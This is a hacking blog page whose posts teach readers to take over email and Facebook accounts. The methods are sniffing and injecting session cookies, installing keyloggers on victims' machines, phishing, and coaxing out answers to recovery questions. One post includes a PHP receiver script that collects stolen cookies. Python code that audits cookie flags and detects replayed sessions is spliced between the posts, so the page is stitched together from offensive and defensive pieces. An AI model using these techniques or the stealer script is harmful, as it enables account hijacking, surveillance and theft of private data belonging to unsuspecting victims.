Showing posts with label Cookie.

Friday, January 16, 2015

How to Hack an Email Account with Cookies


If you are a newbie and don't know about cookies, then for your information: a cookie is a piece of text that the websites a user visits store on the user's computer. The web server uses this stored cookie to identify and authenticate the user. So, if you steal this cookie (which is stored in the victim's browser) and inject the stolen cookie into your own browser, you can imitate the victim's identity to the web server and enter his email account easily. This is called session hijacking. Thus, you can easily hack an email account using such cookie-stealing hacks.

Tools needed for Cookie stealing attack:

Cookie stealing attack requires two types of tools:
  1. Cookie capturing tool
  2. Cookie injecting/editing tool
1. Cookie capturing tool:
Suppose you are running your computer on a LAN and the victim is on the same LAN. Then you can use a cookie capturing tool to sniff all the packets to and from the victim's computer. Some of the packets contain cookie information. These packets can be decoded using the cookie capturing tool, and you can easily obtain the cookie information necessary to hack the email account. Wireshark and HTTP Debugger Pro are two programs that can be used to capture cookies.

Update: check out my Wireshark tutorial for more information on cookie capturing tools.

2. Cookie injecting/editing tool:

Now, once you have successfully captured your victim's cookies, you have to inject those cookies into your browser. This job is done using a cookie injecting tool. Also, in certain cases after injection you need to edit the cookies, which can be done with a cookie editing tool. This cookie injection/editing can be done using simple Firefox add-ons: Add N Edit Cookies and Greasemonkey scripts. I will write more on these two tools in my future articles.

Drawbacks of Cookie Stealing:

Cookie stealing is neglected because it has some serious drawbacks:
  1. A cookie has an expiry time, i.e. after a certain trigger the cookie expires and you cannot use it to hijack the victim's session. Cookie expiry is implemented in two ways:
    1. By assigning a specific timestamp (helpful for us).
    2. By checking for triggers like the user exiting the web browser. In such cases, whenever the user exits his browser his cookie expires and our captured cookie becomes useless.
  2. Cookie stealing becomes useless in an SSL-encrypted environment, i.e. for https (Secure HTTP) links. But most email accounts and social networking sites rarely use https unless the victim has manually set https as the mandatory connection type.
  3. Also, most cookies expire once the victim clicks the Log Out button. So you have to carry out this cookie stealing hack while the user is logged in. But I think this is not such a serious drawback, because most of us have the habit of checking "Remember Me". So very few people actually log out of their accounts on their PCs.
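Seen from the site operator's side, the drawbacks listed above are exactly the controls that make a session cookie hard to steal and replay: sending it only over HTTPS (the Secure flag), hiding it from page scripts (HttpOnly), not attaching it to cross-site requests (SameSite) and keeping its lifetime short. The following Python script is an added example, not code from the original post; it parses Set-Cookie header values and reports which of those protections are missing. The three sample headers, the SESSION_NAME_HINTS list and the one-hour MAX_SESSION_SECONDS limit are constructed assumptions.

```python
"""Audit Set-Cookie headers for the properties that make a session cookie
easy to steal and replay (added example; the headers below are constructed)."""
from dataclasses import dataclass, field
from typing import Dict, List

# Assumption: a session cookie should not outlive one hour; adjust per site.
MAX_SESSION_SECONDS = 3600
# Assumption: substrings that mark a cookie as carrying a session identifier.
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "login")

# Constructed sample headers, as a server might emit them.
WEAK_HEADER = "PHPSESSID=a1b2c3; Path=/"
HARDENED_HEADER = "PHPSESSID=a1b2c3; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=1800"
LONG_LIVED_HEADER = "sessionid=d4e5f6; Path=/; Secure; HttpOnly; SameSite=Lax; Max-Age=2592000"


@dataclass
class CookieFinding:
    name: str
    problems: List[str] = field(default_factory=list)


def parse_set_cookie(header: str) -> Dict[str, object]:
    """Split a Set-Cookie value into name, value and attributes.
    Attribute names are lower-cased; flag attributes (Secure, HttpOnly) map to True."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs: Dict[str, object] = {"__name__": name.strip(), "__value__": value.strip()}
    for part in parts[1:]:
        if not part:
            continue
        key, sep, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if sep else True
    return attrs


def audit_cookie(header: str) -> CookieFinding:
    """Report the weaknesses of one Set-Cookie header value."""
    c = parse_set_cookie(header)
    name = str(c["__name__"])
    finding = CookieFinding(name=name)
    if "secure" not in c:
        finding.problems.append("missing Secure: sent over plain HTTP, so it can be sniffed on the LAN")
    if "httponly" not in c:
        finding.problems.append("missing HttpOnly: readable by page scripts via document.cookie")
    samesite = c.get("samesite")
    if samesite is None or samesite is True or str(samesite).lower() == "none":
        finding.problems.append("SameSite missing or None: attached to cross-site requests")
    # Lifetime checks only matter for cookies that carry a session identifier.
    if any(hint in name.lower() for hint in SESSION_NAME_HINTS):
        if "max-age" in c:
            try:
                if int(str(c["max-age"])) > MAX_SESSION_SECONDS:
                    finding.problems.append("Max-Age too long: a stolen cookie stays valid for days")
            except ValueError:
                finding.problems.append("Max-Age is not an integer")
        elif "expires" in c:
            finding.problems.append("fixed Expires: persists after browser exit instead of ending with the session")
    return finding


def audit_headers(headers: List[str]) -> List[CookieFinding]:
    """Audit several headers in order; an empty problems list means acceptable."""
    return [audit_cookie(h) for h in headers]


if __name__ == "__main__":
    for finding in audit_headers([WEAK_HEADER, HARDENED_HEADER, LONG_LIVED_HEADER]):
        print(finding.name, "->", finding.problems or "ok")
```

Run against a site's own responses (for example the headers captured with the same Wireshark session the post describes, or from the browser's developer tools), the script shows whether drawbacks 1 and 2 above actually apply to that site: a cookie with no Max-Age or Expires is a browser-session cookie and is discarded when the browser exits, and a cookie marked Secure never travels over plain HTTP, so there is nothing on the LAN to sniff.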
So friends, this was a short tutorial on the basics of how to hack an email account using cookie stealing. As I have stated, cookie stealing has some disadvantages. But I think cookie stealing is a handy way to hack an email account. In my next articles, I will post detailed tutorials on hacking Facebook and Gmail accounts using cookie stealing. If you have any problem with this tutorial on how to hack an email account using cookie stealing, please mention it in the comments.

Enjoy Cookie stealing trick to hack Email account.

Wednesday, January 7, 2015

Tutorial: Hacking Facebook Techniques

A note for the newcomers: contrary to popular belief, there doesn't exist some secret software where one can just put in an email id, press "Enter" and have all the passwords associated with that account magically appear. Hacking Facebook, like any other hack, takes time, skill and effort. Also, the methods are much the same for hacking any other type of account, for that matter.

There are 3 main methods used when it comes to hacking Facebook accounts. Briefly, they are:

1. Keyloggers: Making the victim open up his account on a system with a keylogger attached, or sending a remote keylogger to the victim.
2. Phishing: Making a fake login page and having the entered details sent to you. (This has been explained in the "Starting Off" section.)
3. Social Engineering: This is just a fancy term for making the victim give up vital information in a supposedly casual conversation. The information may be the answer to the user's recovery question, which can then be used to take over the account via the "Forgot your password? Click Here!" button.

Some time ago, Facebook developers patched in a new security feature. In a nutshell, if Facebook detects that your IP address is different from the usual (previously used) IP addresses, it may stop you from logging in without further identity verification, which may be, for example, an SMS code. Now this can potentially affect every type of hack, but if it is in fact possible there is only one way to know: by doing it. Hope for the best, prepare for the worst.

1.Keyloggers:
A keylogger is a type of software that usually runs in the background, without the knowledge of an innocent victim, and secretly records their actions. A wide variety of functionality is offered by various products: almost all record every keystroke on the keyboard in a simple text file, some record mouse clicks and pointer locations, some record folders and files opened, and some even take screenshots at regular intervals.
Most keyloggers provide an option to store the text file locally, send it to an FTP server or send it to your email id. They can be installed and set up relatively easily, like any other program. Once set up, they usually go into hiding as a background process, leaving no trace on the surface and starting up automatically when the operating system starts.

For some reason people seem to avoid or overlook keyloggers. I can give you my word that this is the best and easiest method for hacking any type of account there is, so definitely check this out. In our case, we want the victim to log in to their Facebook account on a compromised system, one that has a stealthy keylogger installed. There are two ways to go about this: installing a keylogger on your system and having them use it to log in to their FB account, or, if you have temporary access to their system, installing it on their computer and having the log files sent to you by email or FTP.
Whichever way you prefer, the method is the same. Download a keylogger, follow the setup instructions as you would when installing anything, customize the settings according to your preference and let it rip!
I have personally tried and tested the following keyloggers; you can choose any of them, since they all seem to do the job:

(i) Actual Keylogger - download from http://www.actualkeylogger.com/download-free-key-logger.html
(ii) Home Keylogger - download from http://www.kmint21.com/download.html
(iii) REFOG Free Keylogger - download from https://www.refog.com/download.html

(P.S. Certain full versions of very good keyloggers are available as torrents from websites like isohunt.com and kickass.to, but these torrents are illegal and we shouldn't use them.)

2. Phishing: This method has been described in great detail in the "Starting Off" section. Follow the instructions carefully, using facebook.com instead of gmail.com.

3. Social Engineering:
Facebook uses security questions as a recovery method, and almost everyone sets them to a personal question like:
"Where were you born?"
"What was your first pet's name?"

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction and often involves tricking other people to break normal security procedures. 
A social engineer runs what used to be called a "con game." For example, a person using social engineering to break into a computer network might try to gain the confidence of an authorized user and get them to reveal information that compromises the network's security. Social engineers often rely on the natural helpfulness of people as well as on their weaknesses. They might, for example, call the authorized employee with some kind of urgent problem that requires immediate network access. 
Appeal to vanity, appeal to authority, appeal to greed, and old-fashioned eavesdropping are other typical social engineering techniques. 

For this method to work, you need to know the person whose account you want to hack. In fact, you need to know them well enough that it doesn't seem suspicious when you carefully work their recovery questions into your conversation and get them to answer casually.
After that, using the "Forgot your password? Click Here!" button, one can simply take over the account. But even after this, your work is not done yet. Nowadays Facebook has implemented a 24-hour delay before recovering the account and logging in, so if the victim happens to log in during that period they can reverse the process in seconds. Not only do you need careful planning, but also careful timing.
Facebook uses a verification method during recovery: if the victim's email and phone number are no longer functional, it asks you to put in another phone number. If you can somehow get hold of their cell phone or email account, their account is yours; otherwise the process may be slow and fruitless.

How To Make A Cookie Stealer Php Script

Hi friends, let's look at exactly how a cookie stealer works. There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essence, it's just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is the component that receives the cookie from the sender. It can also take several forms, but the most common is a PHP document, usually found residing on some obscure web server.

Coding a receiver in PHP is the next part. Only two things are needed to make a receiver: a web host/FTP account which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said, the receiver's job is to receive the cookie from the sender. Once the receiver has the cookie, it needs a way to get that cookie to you.


<?php                                      // line 1
$cookie = $HTTP_GET_VARS["cookie"];       // line 2
$file = fopen('cookielog.txt', 'a');     // line 3
fwrite($file, $cookie . "\n\n");        // line 4
?>                                         // line 5

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL ("stealer.php?cookie=x") and stores it in the variable $cookie.
Line 3 opens the file "cookielog.txt" for writing, then stores the file's handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and "\n\n" combines the two strings as one. The "\n\n" acts as a double line-break, making it easier for us to sift through the log file.
Line 5 closes the PHP block.

Done! Just upload the files to the FTP server and set the permissions of the text file "cookielog.txt" to 777. How to grab cookies is explained in the next article, "Complete tutorial on Cross Site Scripting / XSS Hacking!"
Thank you for reading this article.
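Whether the cookie was sniffed off the LAN (first post above) or collected by the receiver script described here, the hijack ends the same way on the server: the same session identifier starts arriving from a second client. The following Python script is an added example, not code from the original post; it reads Apache-style access-log lines that carry the request's Cookie header as a final quoted field (an assumed LogFormat with "%{Cookie}i" appended) and reports every session seen from more than one IP/browser pair. The log lines, the addresses and the PHPSESSID cookie name are constructed assumptions.

```python
"""Detect a session cookie being replayed from a second client, using
constructed access-log lines (added example; not from the original post)."""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Tuple

# Constructed sample log: combined format plus the Cookie header as a last field.
# Session a1b2c3 is used first from 10.0.0.5 (Windows/Firefox) and then from
# 10.0.0.23 (Linux/Firefox), which is what a replayed stolen cookie looks like.
LOG_LINES = [
    '10.0.0.5 - - [16/Jan/2015:10:01:02 +0000] "GET /inbox HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/34.0" "PHPSESSID=a1b2c3"',
    '10.0.0.5 - - [16/Jan/2015:10:01:09 +0000] "GET /inbox?page=2 HTTP/1.1" 200 498 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/34.0" "PHPSESSID=a1b2c3"',
    '10.0.0.23 - - [16/Jan/2015:10:03:40 +0000] "GET /inbox HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/34.0" "PHPSESSID=a1b2c3"',
    '10.0.0.9 - - [16/Jan/2015:10:04:00 +0000] "GET /login HTTP/1.1" 200 300 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/39.0" "-"',
    '10.0.0.9 - - [16/Jan/2015:10:04:10 +0000] "GET /inbox HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 6.1) Chrome/39.0" "PHPSESSID=d4e5f6"',
]

# Assumed log layout: ip ident user [time] "request" status bytes "referer" "ua" "cookie"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)" "(?P<cookie>[^"]*)"$'
)

SESSION_COOKIE = "PHPSESSID"  # assumption: the site's session cookie name


def parse_line(line: str) -> Optional[Dict[str, Optional[str]]]:
    """Parse one log line; returns None if it does not match the assumed format.
    The returned dict has a 'session' key with the session cookie value or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec: Dict[str, Optional[str]] = dict(m.groupdict())
    rec["session"] = None
    for part in (rec["cookie"] or "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == SESSION_COOKIE and value:
            rec["session"] = value
    return rec


def find_replayed_sessions(lines: List[str]) -> Dict[str, List[Tuple[str, str]]]:
    """Map each session id seen from more than one (ip, user-agent) pair to the
    sorted list of those pairs. One session, two clients = a hijack candidate."""
    seen: Dict[str, set] = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["session"]:
            seen[rec["session"]].add((rec["ip"], rec["ua"]))
    return {sid: sorted(clients) for sid, clients in seen.items() if len(clients) > 1}


if __name__ == "__main__":
    for sid, clients in find_replayed_sessions(LOG_LINES).items():
        print(f"session {sid} used from {len(clients)} clients:")
        for ip, ua in clients:
            print(f"  {ip}  {ua}")
```

A session changing IP address is not proof of theft (mobile users roam, offices sit behind NAT), so the sensible response is the one the Facebook post above describes: treat the new client as unverified and require a second factor before it can continue, rather than blocking outright. Combined with regenerating the session id at login and destroying the server-side session at logout (drawback 3 of the first post), this leaves a copied cookie with a very short useful life.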